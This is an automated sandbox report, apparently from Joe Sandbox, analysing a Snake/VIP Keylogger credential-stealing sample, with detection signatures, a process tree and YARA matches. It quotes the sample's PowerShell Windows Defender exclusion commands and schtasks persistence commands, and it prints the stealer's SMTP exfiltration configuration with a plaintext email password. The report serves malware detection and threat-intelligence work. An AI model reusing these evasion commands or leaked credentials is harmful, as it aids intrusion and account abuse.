Edit tour

Windows Analysis Report
WIpGif4IRrFfamQ.exe

Overview

General Information

Sample name:	WIpGif4IRrFfamQ.exe
Analysis ID:	1523246
MD5:	102c9ce1c659517c4ea924c2044305b7
SHA1:	942b0a7e2077eca38b9b6ff16d89722cbbbf7002
SHA256:	b31cbc6ec2eb2b790c422f0f960bb1436106d92958703cb005ccdef38887e310
Tags:	exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

WIpGif4IRrFfamQ.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe" MD5: 102C9CE1C659517C4EA924C2044305B7)

powershell.exe (PID: 5052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7460 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 3180 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WIpGif4IRrFfamQ.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe" MD5: 102C9CE1C659517C4EA924C2044305B7)

AcEnrS.exe (PID: 7400 cmdline: C:\Users\user\AppData\Roaming\AcEnrS.exe MD5: 102C9CE1C659517C4EA924C2044305B7)

schtasks.exe (PID: 7616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AcEnrS.exe (PID: 7708 cmdline: "C:\Users\user\AppData\Roaming\AcEnrS.exe" MD5: 102C9CE1C659517C4EA924C2044305B7)

WerFault.exe (PID: 8048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4473996288.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e68a:$a1: get_encryptedPassword 0x2e9a7:$a2: get_encryptedUsername 0x2e49a:$a3: get_timePasswordChanged 0x2e5a3:$a4: get_passwordField 0x2e6a0:$a5: set_encryptedPassword 0x2fd1f:$a7: get_logins 0x2fc82:$a10: KeyLoggerEventArgs 0x2f8e7:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e9ea:$a1: get_encryptedPassword 0x72e0a:$a1: get_encryptedPassword 0xb702a:$a1: get_encryptedPassword 0x2ed07:$a2: get_encryptedUsername 0x73127:$a2: get_encryptedUsername 0xb7347:$a2: get_encryptedUsername 0x2e7fa:$a3: get_timePasswordChanged 0x72c1a:$a3: get_timePasswordChanged 0xb6e3a:$a3: get_timePasswordChanged 0x2e903:$a4: get_passwordField 0x72d23:$a4: get_passwordField 0xb6f43:$a4: get_passwordField 0x2ea00:$a5: set_encryptedPassword 0x72e20:$a5: set_encryptedPassword 0xb7040:$a5: set_encryptedPassword 0x3007f:$a7: get_logins 0x7449f:$a7: get_logins 0xb86bf:$a7: get_logins 0x2ffe2:$a10: KeyLoggerEventArgs 0x74402:$a10: KeyLoggerEventArgs 0xb8622:$a10: KeyLoggerEventArgs
0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ee4a:$a1: get_encryptedPassword 0x7326a:$a1: get_encryptedPassword 0xb748a:$a1: get_encryptedPassword 0x2f167:$a2: get_encryptedUsername 0x73587:$a2: get_encryptedUsername 0xb77a7:$a2: get_encryptedUsername 0x2ec5a:$a3: get_timePasswordChanged 0x7307a:$a3: get_timePasswordChanged 0xb729a:$a3: get_timePasswordChanged 0x2ed63:$a4: get_passwordField 0x73183:$a4: get_passwordField 0xb73a3:$a4: get_passwordField 0x2ee60:$a5: set_encryptedPassword 0x73280:$a5: set_encryptedPassword 0xb74a0:$a5: set_encryptedPassword 0x304df:$a7: get_logins 0x748ff:$a7: get_logins 0xb8b1f:$a7: get_logins 0x30442:$a10: KeyLoggerEventArgs 0x74862:$a10: KeyLoggerEventArgs 0xb8a82:$a10: KeyLoggerEventArgs
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e797:$a1: get_encryptedPassword 0x3eaaa:$a2: get_encryptedUsername 0x3e5b1:$a3: get_timePasswordChanged 0x3e6ba:$a4: get_passwordField 0x3e7ad:$a5: set_encryptedPassword 0x40c5c:$a7: get_logins 0x40bbf:$a10: KeyLoggerEventArgs 0x40828:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AcEnrS.exe PID: 7400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AcEnrS.exe PID: 7400	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AcEnrS.exe PID: 7400	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: AcEnrS.exe PID: 7400	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AcEnrS.exe PID: 7400	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5163:$a1: get_encryptedPassword 0x5476:$a2: get_encryptedUsername 0x4f7d:$a3: get_timePasswordChanged 0x5086:$a4: get_passwordField 0x5179:$a5: set_encryptedPassword 0x7628:$a7: get_logins 0x758b:$a10: KeyLoggerEventArgs 0x71f4:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: AcEnrS.exe PID: 7708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AcEnrS.exe PID: 7708	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: AcEnrS.exe PID: 7708	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AcEnrS.exe PID: 7708	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc05b:$a1: get_encryptedPassword 0xc36e:$a2: get_encryptedUsername 0xbe75:$a3: get_timePasswordChanged 0xbf7e:$a4: get_passwordField 0xc071:$a5: set_encryptedPassword 0xe520:$a7: get_logins 0xe483:$a10: KeyLoggerEventArgs 0xe0ec:$a11: KeyLoggerEventArgsEventHandler
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ca8a:$a1: get_encryptedPassword 0x2cda7:$a2: get_encryptedUsername 0x2c89a:$a3: get_timePasswordChanged 0x2c9a3:$a4: get_passwordField 0x2caa0:$a5: set_encryptedPassword 0x2e11f:$a7: get_logins 0x2e082:$a10: KeyLoggerEventArgs 0x2dce7:$a11: KeyLoggerEventArgsEventHandler
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a8b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f59:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a1b6:$a4: \Orbitum\User Data\Default\Login Data 0x3ab95:$a5: \Kometa\User Data\Default\Login Data
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d69d:$s1: UnHook 0x2d6a4:$s2: SetHook 0x2d6ac:$s3: CallNextHook 0x2d6b9:$s4: _hook
14.2.AcEnrS.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.AcEnrS.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.AcEnrS.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.AcEnrS.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.AcEnrS.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e88a:$a1: get_encryptedPassword 0x2eba7:$a2: get_encryptedUsername 0x2e69a:$a3: get_timePasswordChanged 0x2e7a3:$a4: get_passwordField 0x2e8a0:$a5: set_encryptedPassword 0x2ff1f:$a7: get_logins 0x2fe82:$a10: KeyLoggerEventArgs 0x2fae7:$a11: KeyLoggerEventArgsEventHandler
14.2.AcEnrS.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c6b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd59:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bfb6:$a4: \Orbitum\User Data\Default\Login Data 0x3c995:$a5: \Kometa\User Data\Default\Login Data
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.AcEnrS.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f49d:$s1: UnHook 0x2f4a4:$s2: SetHook 0x2f4ac:$s3: CallNextHook 0x2f4b9:$s4: _hook
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ca8a:$a1: get_encryptedPassword 0x2cda7:$a2: get_encryptedUsername 0x2c89a:$a3: get_timePasswordChanged 0x2c9a3:$a4: get_passwordField 0x2caa0:$a5: set_encryptedPassword 0x2e11f:$a7: get_logins 0x2e082:$a10: KeyLoggerEventArgs 0x2dce7:$a11: KeyLoggerEventArgsEventHandler
10.2.AcEnrS.exe.40cb580.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.AcEnrS.exe.40cb580.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.AcEnrS.exe.40cb580.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.AcEnrS.exe.4087160.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.AcEnrS.exe.4087160.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.AcEnrS.exe.4087160.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a8b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f59:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a1b6:$a4: \Orbitum\User Data\Default\Login Data 0x3ab95:$a5: \Kometa\User Data\Default\Login Data
10.2.AcEnrS.exe.4087160.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ca8a:$a1: get_encryptedPassword 0x2cda7:$a2: get_encryptedUsername 0x2c89a:$a3: get_timePasswordChanged 0x2c9a3:$a4: get_passwordField 0x2caa0:$a5: set_encryptedPassword 0x2e11f:$a7: get_logins 0x2e082:$a10: KeyLoggerEventArgs 0x2dce7:$a11: KeyLoggerEventArgsEventHandler
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d69d:$s1: UnHook 0x2d6a4:$s2: SetHook 0x2d6ac:$s3: CallNextHook 0x2d6b9:$s4: _hook
10.2.AcEnrS.exe.40cb580.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ca8a:$a1: get_encryptedPassword 0x2cda7:$a2: get_encryptedUsername 0x2c89a:$a3: get_timePasswordChanged 0x2c9a3:$a4: get_passwordField 0x2caa0:$a5: set_encryptedPassword 0x2e11f:$a7: get_logins 0x2e082:$a10: KeyLoggerEventArgs 0x2dce7:$a11: KeyLoggerEventArgsEventHandler
10.2.AcEnrS.exe.4087160.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a8b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f59:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a1b6:$a4: \Orbitum\User Data\Default\Login Data 0x3ab95:$a5: \Kometa\User Data\Default\Login Data
10.2.AcEnrS.exe.40cb580.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a8b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f59:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a1b6:$a4: \Orbitum\User Data\Default\Login Data 0x3ab95:$a5: \Kometa\User Data\Default\Login Data
10.2.AcEnrS.exe.40cb580.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d69d:$s1: UnHook 0x2d6a4:$s2: SetHook 0x2d6ac:$s3: CallNextHook 0x2d6b9:$s4: _hook
10.2.AcEnrS.exe.4087160.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d69d:$s1: UnHook 0x2d6a4:$s2: SetHook 0x2d6ac:$s3: CallNextHook 0x2d6b9:$s4: _hook
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e88a:$a1: get_encryptedPassword 0x72aaa:$a1: get_encryptedPassword 0x2eba7:$a2: get_encryptedUsername 0x72dc7:$a2: get_encryptedUsername 0x2e69a:$a3: get_timePasswordChanged 0x728ba:$a3: get_timePasswordChanged 0x2e7a3:$a4: get_passwordField 0x729c3:$a4: get_passwordField 0x2e8a0:$a5: set_encryptedPassword 0x72ac0:$a5: set_encryptedPassword 0x2ff1f:$a7: get_logins 0x7413f:$a7: get_logins 0x2fe82:$a10: KeyLoggerEventArgs 0x740a2:$a10: KeyLoggerEventArgs 0x2fae7:$a11: KeyLoggerEventArgsEventHandler 0x73d07:$a11: KeyLoggerEventArgsEventHandler
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c6b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x808d6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd59:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ff79:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bfb6:$a4: \Orbitum\User Data\Default\Login Data 0x801d6:$a4: \Orbitum\User Data\Default\Login Data 0x3c995:$a5: \Kometa\User Data\Default\Login Data 0x80bb5:$a5: \Kometa\User Data\Default\Login Data
0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f49d:$s1: UnHook 0x736bd:$s1: UnHook 0x2f4a4:$s2: SetHook 0x736c4:$s2: SetHook 0x2f4ac:$s3: CallNextHook 0x736cc:$s3: CallNextHook 0x2f4b9:$s4: _hook 0x736d9:$s4: _hook
10.2.AcEnrS.exe.40cb580.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.AcEnrS.exe.40cb580.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.AcEnrS.exe.40cb580.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.AcEnrS.exe.40cb580.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e88a:$a1: get_encryptedPassword 0x72caa:$a1: get_encryptedPassword 0xb6eca:$a1: get_encryptedPassword 0x2eba7:$a2: get_encryptedUsername 0x72fc7:$a2: get_encryptedUsername 0xb71e7:$a2: get_encryptedUsername 0x2e69a:$a3: get_timePasswordChanged 0x72aba:$a3: get_timePasswordChanged 0xb6cda:$a3: get_timePasswordChanged 0x2e7a3:$a4: get_passwordField 0x72bc3:$a4: get_passwordField 0xb6de3:$a4: get_passwordField 0x2e8a0:$a5: set_encryptedPassword 0x72cc0:$a5: set_encryptedPassword 0xb6ee0:$a5: set_encryptedPassword 0x2ff1f:$a7: get_logins 0x7433f:$a7: get_logins 0xb855f:$a7: get_logins 0x2fe82:$a10: KeyLoggerEventArgs 0x742a2:$a10: KeyLoggerEventArgs 0xb84c2:$a10: KeyLoggerEventArgs
10.2.AcEnrS.exe.40cb580.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e88a:$a1: get_encryptedPassword 0x72aaa:$a1: get_encryptedPassword 0x2eba7:$a2: get_encryptedUsername 0x72dc7:$a2: get_encryptedUsername 0x2e69a:$a3: get_timePasswordChanged 0x728ba:$a3: get_timePasswordChanged 0x2e7a3:$a4: get_passwordField 0x729c3:$a4: get_passwordField 0x2e8a0:$a5: set_encryptedPassword 0x72ac0:$a5: set_encryptedPassword 0x2ff1f:$a7: get_logins 0x7413f:$a7: get_logins 0x2fe82:$a10: KeyLoggerEventArgs 0x740a2:$a10: KeyLoggerEventArgs 0x2fae7:$a11: KeyLoggerEventArgsEventHandler 0x73d07:$a11: KeyLoggerEventArgsEventHandler
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c6b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80ad6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc4cf6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd59:$a3: \Google\Chrome\User Data\Default\Login Data 0x80179:$a3: \Google\Chrome\User Data\Default\Login Data 0xc4399:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bfb6:$a4: \Orbitum\User Data\Default\Login Data 0x803d6:$a4: \Orbitum\User Data\Default\Login Data 0xc45f6:$a4: \Orbitum\User Data\Default\Login Data 0x3c995:$a5: \Kometa\User Data\Default\Login Data 0x80db5:$a5: \Kometa\User Data\Default\Login Data 0xc4fd5:$a5: \Kometa\User Data\Default\Login Data
10.2.AcEnrS.exe.40cb580.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c6b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x808d6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd59:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ff79:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bfb6:$a4: \Orbitum\User Data\Default\Login Data 0x801d6:$a4: \Orbitum\User Data\Default\Login Data 0x3c995:$a5: \Kometa\User Data\Default\Login Data 0x80bb5:$a5: \Kometa\User Data\Default\Login Data
0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f49d:$s1: UnHook 0x738bd:$s1: UnHook 0xb7add:$s1: UnHook 0x2f4a4:$s2: SetHook 0x738c4:$s2: SetHook 0xb7ae4:$s2: SetHook 0x2f4ac:$s3: CallNextHook 0x738cc:$s3: CallNextHook 0xb7aec:$s3: CallNextHook 0x2f4b9:$s4: _hook 0x738d9:$s4: _hook 0xb7af9:$s4: _hook
10.2.AcEnrS.exe.40cb580.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f49d:$s1: UnHook 0x736bd:$s1: UnHook 0x2f4a4:$s2: SetHook 0x736c4:$s2: SetHook 0x2f4ac:$s3: CallNextHook 0x736cc:$s3: CallNextHook 0x2f4b9:$s4: _hook 0x736d9:$s4: _hook
10.2.AcEnrS.exe.4087160.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
